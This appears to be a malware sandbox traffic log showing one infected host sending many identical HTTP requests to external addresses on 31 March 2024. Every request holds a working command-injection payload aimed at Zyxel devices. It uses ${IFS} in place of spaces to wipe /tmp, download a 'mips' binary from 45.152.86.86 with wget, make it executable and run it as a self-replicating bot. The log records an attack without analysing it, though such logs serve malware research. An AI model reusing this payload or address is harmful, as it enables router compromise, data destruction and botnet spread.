                              Mar 31, 2024 08:42:06.335170984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8492192.168.2.133569014.144.142.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335186005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8493192.168.2.1343372199.121.115.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335242033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8494192.168.2.134649619.85.33.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335280895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8495192.168.2.1357050140.217.255.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335347891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8496192.168.2.1346878136.248.106.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335374117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8497192.168.2.135390624.147.153.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335412979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8498192.168.2.1335474107.68.223.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335470915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8499192.168.2.1359114187.156.119.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335479975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8500192.168.2.136034460.154.248.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335541964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8501192.168.2.134170250.55.5.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335589886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8502192.168.2.133694088.215.137.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335621119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8503192.168.2.1336656102.245.115.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335666895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8504192.168.2.135875661.204.151.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335730076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8505192.168.2.1341616177.116.240.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335778952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8506192.168.2.1352248211.58.79.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335822105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8507192.168.2.1357752172.209.148.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335885048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8508192.168.2.1347708201.106.194.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335926056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8509192.168.2.1356844210.138.77.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335979939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8510192.168.2.134943888.243.193.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336016893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8511192.168.2.1342672199.114.51.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336085081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8512192.168.2.1338228181.120.143.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336119890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8513192.168.2.135274635.124.34.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336177111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8514192.168.2.134841688.58.3.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336224079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8515192.168.2.13480422.86.104.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336266994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8516192.168.2.13481022.183.219.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336321115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8517192.168.2.134121493.35.97.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336360931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8518192.168.2.1352394126.48.15.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336407900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8519192.168.2.133942896.245.152.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336458921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8520192.168.2.135659083.101.14.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336509943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8521192.168.2.135820825.144.49.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336594105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8522192.168.2.1354808155.219.239.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336627007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8523192.168.2.133510688.98.242.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336682081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8524192.168.2.135096084.60.148.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336735010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8525192.168.2.1345410134.199.179.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336774111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8526192.168.2.1349536108.104.18.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336828947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8527192.168.2.133418892.133.148.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336879969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8528192.168.2.13527922.154.146.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336931944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8529192.168.2.1337372166.238.254.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.336982965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8530192.168.2.1359726173.120.44.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337021112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8531192.168.2.1356842118.14.243.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337069988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8532192.168.2.1341992216.89.105.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337131023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8533192.168.2.133407024.74.3.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337188959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8534192.168.2.134184693.191.32.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337239981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8535192.168.2.1345466203.192.150.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337300062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8536192.168.2.1338724170.35.142.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337327957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8537192.168.2.1348720137.221.63.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337387085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8538192.168.2.1355812199.166.194.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337440968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8539192.168.2.1356318176.234.19.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337476969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8540192.168.2.135221667.11.200.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337543011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8541192.168.2.1359372204.146.45.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337593079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8542192.168.2.1347182171.37.173.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.337627888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8543192.168.2.134724236.130.87.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.342073917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8544192.168.2.1336380205.192.77.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.342113972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8545192.168.2.134317846.149.236.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.342143059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8546192.168.2.1357096106.237.85.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.342190981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8547192.168.2.135806434.54.142.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.342226028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8548192.168.2.1350844106.131.34.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.342262030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8549192.168.2.135601648.40.226.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.342314005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8550192.168.2.1360040111.93.211.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348200083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8551192.168.2.1338996213.197.175.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348259926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8552192.168.2.133756627.67.32.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348310947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8553192.168.2.135811068.33.197.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348354101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8554192.168.2.1334426153.161.171.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348381996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8555192.168.2.1335012206.4.211.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348428965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8556192.168.2.1337198187.74.110.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348464012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8557192.168.2.1335530129.169.63.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348503113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8558192.168.2.1347332135.174.151.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348556042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8559192.168.2.1333964148.156.169.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348603964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8560192.168.2.135166424.109.67.190443
                              TimestampBytes transferredDirectionData
